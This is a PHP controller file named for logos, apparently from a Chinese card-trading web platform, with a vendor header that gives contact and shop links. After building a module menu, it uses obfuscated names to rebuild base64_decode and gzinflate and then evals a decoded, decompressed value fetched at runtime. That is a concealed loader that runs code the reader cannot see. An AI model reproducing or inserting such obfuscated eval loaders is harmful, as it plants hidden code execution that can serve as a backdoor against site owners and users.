<?php
/****************************************/
/*                                      */
/*  百信卡盟平台联系QQ:84945491         */
/*  淘宝店 http://shop70674652.taobao.com  */
/*  百信卡盟 http://www.caipiaobus.com  */
/*                                      */
/****************************************/

if ( !defined( "UPATH_ROOT" ) )
{
                exit( "hacking deny" );
}
class LogoController extends Controller
{

                public function __construct( )
                {
                }

                public function Index( )
                {
                                $Rb51511500c = array( );
                                if ( UB_B2C )
                                {
                                                $Rb51511500c[] = array( "name" => "零售系统", "m" => "mod_b2c" );
                                }
                                if ( UB_B2B )
                                {
                                                $Rb51511500c[] = array( "name" => "批发系统", "m" => "mod_b2b" );
                                }
                                if ( UB_YKT )
                                {
                                                $Rb51511500c[] = array( "name" => "一卡通", "m" => "mod_ykt" );
                                }
                                if ( 1 < UB_B2C + UB_B2B + UB_YKT )
                                {
                                                $Rb51511500c[] = array( "name" => "引导页", "m" => "mod_index" );
                                }
                                $Oooo00 = "base64_decode";
                                $ooOO00o = $Oooo00( "YmFzZTY0X2RlY29kZQ==" );
                                $o00OO = $Oooo00( "Z3ppbmZsYXRl" );
                                $cphp0 = __FILE__;
                                eval( $o00OO( $ooOO00o( $this->comget( "ukerv" ) ) ) );
                                 $this->View( );
                }

}

?>
